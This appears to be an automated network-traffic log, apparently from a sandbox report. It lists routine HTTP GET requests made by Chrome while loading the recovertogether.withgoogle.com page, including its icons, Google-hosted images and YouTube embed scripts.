            Source: global trafficHTTP traffic detected: GET /static/images/icons/linkedin_original.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/?utm_source=HPP&utm_medium=referral&utm_campaign=recovertogetherAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/twitter_original.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/?utm_source=HPP&utm_medium=referral&utm_campaign=recovertogetherAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/menu.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/menu_close.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/js/third_party/markerclustererplus.min.js HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://recovertogether.withgoogle.com/?utm_source=HPP&utm_medium=referral&utm_campaign=recovertogetherAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/link_original.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/share.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/facebook_original.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/email_original.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /3l1m7o0VIsYE1DJXDVlhGMrvGxSzjpczwa5DMARfvEvJe9bV_Hhbdq8GeB4ewqPdPaYDNHxQfarVm_w13BRIOryoo0sTffYinVmjnA=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/images/icons/linkedin_original.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/twitter_original.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /C-3n9JWip1MhvjSOHobQZ_LIR0vFDS9XtRCeluAgkojyN42e40hd4UCOQ_ZLrLPQbR3VUeNy_z-H3-DGwqKubSyroa6-rgSforT48kag=w1280-h720-pp HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ZbVcVI5gznupH4HWFYJkqkZnHDAC09j3j3LY1PG0DYacRBX2Pko8UhGbp9Y7bhb3DUROSOs-hort72vxN96ce6LxOkzZySbUTym6faGr=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ZpM4XtnnmV5u9Ma4HVH5__398H-zbdEWY6gHoAInHWFrca2xBeoEBkNiVENs5baX82LjnyEXvZNX7ML3gHTa401Vg1gXKsWrEar8zQ=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /E3lvRhQswqrwmzhBUWdsFm6C4eoyCz-C0OaFNgCdJsbEoU-soPRlzMtUtlcqFP8zSgxTGeNY6joo9CqUiw1RSE0Imcr7wWPeIWRmo3Y=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /xilsk7-wXZ16VD4gYsv-2bNtfVkjz5JE_aGh5eS8hhUVeUb8zmNPvGgyhgXLex3TpAf-Y3sMqDpCOmZ9SlHgsrZYTORpZpiinD-AJUE=s0 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rqSGi625g53oF9X58-LG_7kghfxLypCKXdx1c25r2ypmii0f5DcFeQe2baMC4u_0gwknLaADlUhdK3Pq-g2a69MwPBVjlyMLbIKr1A=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/js/third_party/markerclustererplus.min.js HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /wtw1KX4QKxdb9HbcQHRw4WsP88O76isYP8JmYFcVpXjHy0tckXFnms1Hgm8jbw8cY53Mx7b-x28HuQkP3nszcom9PGbKiLK1EKkSiqmb=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/images/maps/select_arrow.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /C-3n9JWip1MhvjSOHobQZ_LIR0vFDS9XtRCeluAgkojyN42e40hd4UCOQ_ZLrLPQbR3VUeNy_z-H3-DGwqKubSyroa6-rgSforT48kag=w1280-h720-pp HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/images/icons/cta-arrow-down.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/accordion-arrow.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /ZbVcVI5gznupH4HWFYJkqkZnHDAC09j3j3LY1PG0DYacRBX2Pko8UhGbp9Y7bhb3DUROSOs-hort72vxN96ce6LxOkzZySbUTym6faGr=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ZpM4XtnnmV5u9Ma4HVH5__398H-zbdEWY6gHoAInHWFrca2xBeoEBkNiVENs5baX82LjnyEXvZNX7ML3gHTa401Vg1gXKsWrEar8zQ=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/images/icons/youtube_play_default.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /3l1m7o0VIsYE1DJXDVlhGMrvGxSzjpczwa5DMARfvEvJe9bV_Hhbdq8GeB4ewqPdPaYDNHxQfarVm_w13BRIOryoo0sTffYinVmjnA=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/images/icons/cta-arrow-right.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /E3lvRhQswqrwmzhBUWdsFm6C4eoyCz-C0OaFNgCdJsbEoU-soPRlzMtUtlcqFP8zSgxTGeNY6joo9CqUiw1RSE0Imcr7wWPeIWRmo3Y=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/images/icons/carousel-arrow-right.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /rqSGi625g53oF9X58-LG_7kghfxLypCKXdx1c25r2ypmii0f5DcFeQe2baMC4u_0gwknLaADlUhdK3Pq-g2a69MwPBVjlyMLbIKr1A=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /static/images/maps/select_arrow.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/cta-arrow-down.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/accordion-arrow.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/youtube_play_default.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/cta-arrow-right.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /static/images/icons/carousel-arrow-right.svg HTTP/1.1Host: recovertogether.withgoogle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: language-choice=x-default
            Source: global trafficHTTP traffic detected: GET /wtw1KX4QKxdb9HbcQHRw4WsP88O76isYP8JmYFcVpXjHy0tckXFnms1Hgm8jbw8cY53Mx7b-x28HuQkP3nszcom9PGbKiLK1EKkSiqmb=w2000 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /iframe_api?trustedtypes=1 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/www-widgetapi.vflset/www-widgetapi.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
